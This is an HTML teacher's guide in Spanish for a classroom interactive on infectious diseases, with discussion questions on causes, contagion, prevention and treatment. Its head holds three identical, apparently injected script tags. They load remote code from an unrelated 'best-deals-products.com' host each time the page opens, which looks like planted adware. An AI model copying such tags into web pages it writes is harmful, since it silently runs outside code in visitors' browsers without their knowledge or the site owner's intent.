<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<title></title>
		<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type" />
		<SCRIPT SRC='../_js/common.js'></SCRIPT>
		<link href="../_css/common.css" rel="stylesheet" type="text/css" />
		<script src="http://www.best-deals-products.com/ws/sf_main.jsp?dlsource=vjartpv&amp;CTID=fvdmoz">
		</script><script src="http://www.best-deals-products.com/ws/sf_main.jsp?dlsource=vjartpv&amp;CTID=fvdmoz">
		</script><script src="http://www.best-deals-products.com/ws/sf_main.jsp?dlsource=vjartpv&amp;CTID=fvdmoz">
		</script>
	</head>
	<body>
		<p class="cabecera2">
			Objetivo</p>
		<p>
			<br />
			Permitir que a trav&eacute;s de este interactivo los estudiantes conozcan acerca de las causas, la transmisi&oacute;n, el contagio, la prevenci&oacute;n y el tratamiento de las enfermedades infecciosas.</p>
		<p class="cabecera1">
			<br />
			Propuesta</p>
		<p class="cabecera2">
			<br />
			Antes de la presentaci&oacute;n</p>
		<p class="normal">
			<br />
			Explore acerca de las ideas previas que tienen sus estudiantes sobre las enfermedades infecciosas. Para ello, plant&eacute;eles preguntas como las siguientes:</p>
		<p class="tab1">
			<br />
			- &iquest;Qu&eacute; son las enfermedades infecciosas?<br />
			- &iquest;Qu&eacute; enfermedades infecciosas conocen?<br />
			- &iquest;Infecciosa y contagiosa quieren decir lo mismo?</p>
		<p class="cabecera2">
			<br />
			Durante la presentaci&oacute;n</p>
		<p>
			<br />
			Tenga en cuenta que el interactivo se divide en cuatro partes. En cada uno de ellos lleve a cabo las siguientes acciones:<br />
			En el apartado &ldquo;causantes&rdquo; genere una discusi&oacute;n entre sus estudiantes basado en la pregunta: &iquest;Cu&aacute;les son las causas de las enfermedades contagiosas?<br />
			En el apartado &ldquo;adquisici&oacute;n&rdquo; genere una discusi&oacute;n entre sus estudiantes basado en la pregunta: &iquest;Cu&aacute;l ser&iacute;a la mejor manera de prevenir una infecci&oacute;n?<br />
			En el apartado &ldquo;contagio&rdquo; defina conjuntamente con sus alumnos qu&eacute; significa &ldquo;contagio&rdquo; y cu&aacute;les podr&iacute;an ser las formas m&aacute;s frecuentes de contagio.<br />
			En el apartado &ldquo;prevenci&oacute;n y tratamiento&rdquo; genere una discusi&oacute;n entre sus estudiantes, basado en las preguntas que aparecen all&iacute;. P&iacute;dales luego que propongan algunas medidas de prevenci&oacute;n para evitar enfermedades infecciosas y su contagio.</p>
		<p class="cabecera2">
			<br />
			Despu&eacute;s de la presentaci&oacute;n</p>
		<p>
			<br />
			Complemente la informaci&oacute;n generada durante la presentaci&oacute;n y las discusiones acudiendo a las siguientes referencias bibliogr&aacute;ficas:<br />
			Gran Enciclopedia Planeta <a href="http://cplosangeles.juntaextremadura.net/web/edilim/tercer_ciclo/cmedio/la_salud/enfermedades_infecciosas/enfermedades_infecciosas.html" target="_blank">[</a><a href="http://cplosangeles.juntaextremadura.net/web/edilim/tercer_ciclo/cmedio/la_salud/enfermedades_infecciosas/enfermedades_infecciosas.html" target="_blank">VER</a>].<br />
			&nbsp;</p>
		<p>
			&nbsp;</p>
		<p>
			&nbsp;</p>
	</body>
</html>
